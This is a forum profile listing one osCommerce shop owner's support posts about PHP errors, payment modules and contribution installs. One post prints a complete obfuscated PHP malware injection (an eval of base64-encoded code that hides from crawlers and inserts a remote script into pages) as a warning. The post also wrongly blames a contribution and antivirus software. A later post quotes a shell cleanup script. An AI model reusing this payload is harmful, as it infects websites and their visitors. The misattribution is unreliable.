Jump to content

ladykaren

Members
  • Content count

    295
  • Joined

  • Last visited

Everything posted by ladykaren

  1. Hi all; I've decided to build an osc website again and my host company has the 2.3.1 version. I like it, but ...... wow, different from the ms 2.2 I'm used to lol Anyways, I am trying to install the Linkmatics Attribute Sets Plus. I finally got the sql in the database, uploaded all the new files and am working on putting in the manual edits. I've run into a snag with the Admin/Includes/Boxes/Catagories.php Obviously this file is very different from an older version of osc and I had no clue how to add the new code. Sooooo, I decided for giggles to try something. This is what the new coding looks like array( 'code' => FILENAME_PRODUCTS_ATTRIBUTES, 'code' => FILENAME_PRODUCTS_ATTRIBUTES_SETS, 'title' => BOX_CATALOG_CATEGORIES_PRODUCTS_ATTRIBUTES, 'title' => BOX_CATALOG_CATEGORIES_PRODUCTS_ATTRIBUTES_SETS, 'link' => tep_href_link(FILENAME_PRODUCTS_ATTRIBUTES) 'link' => tep_href_link(FILENAME_PRODUCTS_ATTRIBUTES_SETS) ), I logged into my Admin to see if things were going ok and got the Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in /home/brideazz/public_html/admin/includes/boxes/catalog.php on line 27 I figured out that I had left of the ) on the last line, but when I refreshed the Admin it shows the same error. So now I'm at Step 6 of the install and stuck. I'm not even sure if this contrib (which I really really need) will work with 2.3.1 Can anyone help?? Thanks in advance
  2. Hi Jim; Thanks for your reply. Putting the code back to the original took out the error, but coding is needed to install Attribute Sets Plus. I think I'm permanently stuck. Does anyone know if there will be a version that will work with 2.3.1?
  3. ladykaren

    Checkout process looping back to shipping

    Hi again; I've noticed something with my site. It will go through checkout process fine when using Google Chrome, but it won't go passed the shipping.php when using the Mozilla browser. Help??? Thanks, Karen
  4. Hi all; I installed Authorize.net AIM a month back and got everything working including working out a bug with Authorize.net I went onto my site to run a test order to make sure everything is still working and have found that when I go through the checkout process, I can't get passed the shipping page. When I click Continue it just loops back. HELP??? Thanks, Karen
  5. Hi there; I was wondering if someone could help me please. I just installed Authorize.net AIM and have all the settings set. But when I run a test order, after clicking Confirm Order, I receive this error : Parse error: syntax error, unexpected T_VARIABLE in /home/content/l/a/d/ladykdelights/html/catalog/checkout_process.php on line 56 Here is the surrounding code snippet : // load the selected shipping module require(DIR_WS_CLASSES . 'shipping.php'); $shipping_modules = new shipping($shipping); require(DIR_WS_CLASSES . 'order.php'); $order = new order; require(DIR_WS_CLASSES . 'order_total.php'); $order_total_modules = new order_total; $order_totals = $order_total_modules->process(); // load the before_process function from the payment modules $payment_modules->before_process(); (line 56) $sql_data_array = array('customers_id' => $customer_id, 'customers_name' => $order->customer['firstname'] . ' ' . $order->customer['lastname'], 'customers_company' => $order->customer['company'], 'customers_street_address' => $order->customer['street_address'], Can anyone see where the error is coming from? Thanks for your help
  6. ladykaren

    Parse error: syntax error, unexpected T_VARIABLE

    Hi again; I found it. There was a couple of white spaces at the bottom of the authorize.net_php file. YIPPIE the test order worked lol
  7. ladykaren

    Parse error: syntax error, unexpected T_VARIABLE

    Hi germ; Thanks so much for getting back. I moved modules up to the first line. That took care of that problem. Now if I run a test order, after clicking confirm, I get this - Warning: Cannot modify header information - headers already sent by (output started at /home/content/l/a/d/ladykdelights/html/catalog/includes/modules/payment/authorizenet_aim.php:921) in /home/content/l/a/d/ladykdelights/html/catalog/includes/functions/general.php on line 33 Here is snippet of code for catalog/includes/function/general.php // Redirect to another page or site function tep_redirect($url) { if ( (strstr($url, "\n") != false) || (strstr($url, "\r") != false) ) { tep_redirect(tep_href_link(FILENAME_DEFAULT, '', 'NONSSL', false)); } if ( (ENABLE_SSL == true) && (getenv('HTTPS') == 'on') ) { // We are loading an SSL page if (substr($url, 0, strlen(HTTP_SERVER)) == HTTP_SERVER) { // NONSSL url $url = HTTPS_SERVER . substr($url, strlen(HTTP_SERVER)); // Change it to SSL } } header('Location: ' . $url); (line 33) tep_exit(); } //// // Parse the data used in the html tags to ensure the tags will not break function tep_parse_input_field_data($data, $parse) { return strtr(trim($data), $parse); } function tep_output_string($string, $translate = false, $protected = false) { if ($protected == true) { return htmlspecialchars($string); } else { if ($translate == false) { return tep_parse_input_field_data($string, array('"' => '"')); } else { return tep_parse_input_field_data($string, $translate); } } } Help again please Thanks so much
  8. Hi there; I was wondering if someone could help me please. I just installed this contrib and have all the settings set. But when I run a test order I receive this error : Parse error: syntax error, unexpected T_VARIABLE in /home/content/l/a/d/ladykdelights/html/catalog/checkout_process.php on line 56 Here is the surrounding code snippet : // load the selected shipping module require(DIR_WS_CLASSES . 'shipping.php'); $shipping_modules = new shipping($shipping); require(DIR_WS_CLASSES . 'order.php'); $order = new order; require(DIR_WS_CLASSES . 'order_total.php'); $order_total_modules = new order_total; $order_totals = $order_total_modules->process(); // load the before_process function from the payment modules $payment_modules->before_process(); $sql_data_array = array('customers_id' => $customer_id, 'customers_name' => $order->customer['firstname'] . ' ' . $order->customer['lastname'], 'customers_company' => $order->customer['company'], 'customers_street_address' => $order->customer['street_address'], Can anyone see where the error is coming from? Thanks for your help
  9. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Hi all; I ran a test through sandbox and apparently google has stopped working again. Even with a US shipping address, I get the box "You do not have a shipping method" blah blah Can anyone help me with this thing? I will even pay someone to get this working properly and also set up international shipping as long as the rate is reasonable. I haven't had an order in 2 months and this is my living here. HELP !!!!
  10. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Hi Speed; Thanks for getting back. I went into googlecheckout folder and opened the htpasswd php and changed both the production and sandbox id/key and tried to run the response handler again but the username/password box will still not take. I use GoDaddy as host and I can't change password protect on the googlecheckout folder itself. I tick the folder and go to Permission then go to Password Protect and I get a warning popup "one or more files are custom and cannot be edited" Sigh ... I'm stuck again. I ran a test order in sandbox and am receiving an email from GC about the order, but the order doesn't show up in Osc admin. I have the XML ticked in settings on the API page in GC. Course this has nothing to do with getting international shipping set up LOL I did find this http://www.oscommerce.com/community/contributions,5157/category,1/search,google+checkout that says the mod will remove restrictions international shipping but it says nothing on where to install it. *Banging head against desk*
  11. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Back again; I also checked the response_error log and this is listed Thu Sep 16 17:35:07 MST 2010:- Failed to Get Basic Authentication Headers How can I fix this please?
  12. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Ok .... fixed the T_CASE error but now I am getting a login box A username and password are being requested by http://ladykbridalplus.com. The site says: "Google checkout Basic Authentication" I've tried my admin login and merchant id/key for both sandbox and production accounts but nothing takes. Do I need to set something else up somewhere?
  13. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Hi again; I've been doing some more testing and I found a glitch When I run http://ladykbridalplus.com/catalog/googlecheckout/responsehandler.php I get Parse error: syntax error, unexpected T_CASE in /home/content/l/a/d/ladykdelights/html/catalog/googlecheckout/responsehandler.php on line 710 googled T_CASE error ..... fix is to put } on line 709 which is already there Help?
  14. ladykaren

    Whos Online

    Hi all; I'm trying to upgrade my Whos Online contrib, using V 3.6.6.6 Everything is uploaded but it is not showing visitors, not even Admin as it did before. I'm wondering if I missed something? Maybe a missing code in Application top.php? Any help would be most appreciated. Thanks
  15. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Hi again; Thanks Speed. I did what the ReadMe said to do, but for whatever reason it is still not recognizing international shipping. What am I doing wrong???
  16. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Can anyone help me set up international shipping????
  17. ladykaren

    Remove Unused Images [Support Thread]

    Hi there; I've tried installing this contrib again as had a problem with it several months ago, but I am still having the same problem ...... When run Remove Images from Admin, I get a blank page. Here is how I installed the contrib : Uploaded remove_unused_images.php to catalog/admin In admin/includes/filenames.php file add: define('FILENAME_REMOVE_IMAGES', 'remove_unused_images.php'); In admin\includes\boxes\tools.php add: '<a href="' . tep_href_link(FILENAME_REMOVE_IMAGES, '', 'NONSSL') . '" class="menuBoxContentLink">' . BOX_TOOLS_REMOVE_IMAGES . '</a><br>' . In admin/includes/languages/english.php add: define('BOX_TOOLS_REMOVE_IMAGES', 'Remove Images'); I don't use an ftp so the file could not be corrupted. Not sure what to try now. Help?
  18. ladykaren

    Offical Google Checkout module for osCommerce Support Thread

    Hi there; I need a helping hand please. I've installed Google Checkout but I need to change whatever setting to allow for international sales. Could someone please let me know how to do this please? The more information I read on this subject my bigger my headache gets LOL Thanks in advance
  19. ladykaren

    free shipping by categories support thread

    Hi; I have this contrib installed but have run into a snag. I also have Order Editor installed and am now receiving this error when I try to manually edit an order : Fatal error: Call to undefined function: tep_get_categories_name() in /home/content/l/a/d/ladykdelights/html/catalog/includes/modules/shipping/freecats.php on line 80 Does any one know of a fix for this? Any help would be most appreciated :)
  20. ladykaren

    Who's Online Enhancement 1.4

    Hi all; I had to re install this contrib and used version 3.6.6.6 I wrote the code so Who's Online appears in the Tools box in Admin. The screen comes up fine however it shows no visitors on my site, not even Admin and there is always somebody visiting my site. Can anyone tell me if I missed something in the install? I seem to recall having I believe a // define code somewhere but I'm not sure. Any help would be greatly appreciated. Thanks
  21. ladykaren

    Who's Online Contrib - MUST READ

    Thanks for responding Chris. I was so hoping it wasn't the contrib. I really liked that contrib :) I did find out the problem. It's the holasionweb.com virus that attached GoDaddy systems. After some google searching on how to remove it from my site (GoDaddy wasn't much help as usual) I ran across this script that is supposed to remove malware : Copy this script and save as cleaner.php Site clean up by <a href="http://sucuri.net">http://sucuri.net</a><br /> This script will clean the malware from this attack: <a href="http://sucuri.net/malware/entry/MW:MROBH:1">http://sucuri.net/malware/entry/MW:MROBH:1</a> <br /><br /> If you need help, contact dd@sucuri.net or visit us at <a href="http://sucuri.net/index.php?page=nbi"> http://sucuri.net/index.php?page=nbi</a> <br /> <br /> <?php $dir = "./"; $rmcode = `find $dir -name "*.php" -type f |xargs sed -i 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1`; echo "Malware removed.<br />\n"; $emptyline = `find $dir -name "*.php" -type f | xargs sed -i '/./,$!d' 2>&1`; echo "Empty lines removed.<br />\n"; ?> <br /> Completed. $removejs = find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://holasionweb\.com.*/script>##g' 2>&1; $removejs = find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://www.indesignstudioinfo\.com.*/script>##g' 2>&1; $removejs = find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://zettapetta\.com.*/script>##g' 2>&1; echo "Javascript removed. \n"; Now upload the file to your root and run it in a new browser window. From what I can tell it seems to have worked. I went to my site, ladykbridalplus.com from a different computer and no ugly red boxes popped up. So I hope this helps anyone else out there with this problem. I also took your advice and deleted the File Manager and Define Languages from my Admin section. I also loaded up IP-Trap contrib but have a snag as I am unable to change the permission for the banned folder to 755 as per the instructions. I was able to change the 2 txt files. So have to try and figure that out or try a different contrib. Thanks again for your help.
  22. Hi everyone; I don't know if anyone else has run into this, but I wanted to give a heads up. I installed the Who's Online contrib several months ago and have enjoyed the features. However, this week I went onto my site to check something and out of the blue there was a nasty red warning box from AVG virus stating that my site was a known phishing site and was blocked for my protection. I can only assume that this is due to the Who's Online contrib. I have spent the last hour going through all the php pages of my site removing a coding that has been placed on just about every page. I assume AVG zapped the code into my files. <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5b2IyeGhjMmx2Ym5kbFlpNWpiMjB2YjI4dWNHaHdJajQ4TDNOamNtbHdkRDQ9Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?> I just wanted to let everyone know in case you've installed any contrib with features like Who's Online. Be Fore Warned
  23. ladykaren

    The Feedmachine Solution

    This is line 55 while( $file = $dir->read() ) {
  24. ladykaren

    The Feedmachine Solution

    Hi Lech; Sorry I've been out of touch. My computer crashed and other difficulties and I'm now finally getting back to problems. I've double and triple checked everything but I am still receiving this message whenever I click on FeedMachine tab in my Admin Fatal error: Call to a member function on a non-object in /home/content/l/a/d/ladykdelights/html/catalog/admin/feedmachine_loader.php on line 55 Any ideas? Thanks in advance
  25. ladykaren

    The Feedmachine Solution

    Hi Leah; Yes, I double checked and everything is in place where it should be.
×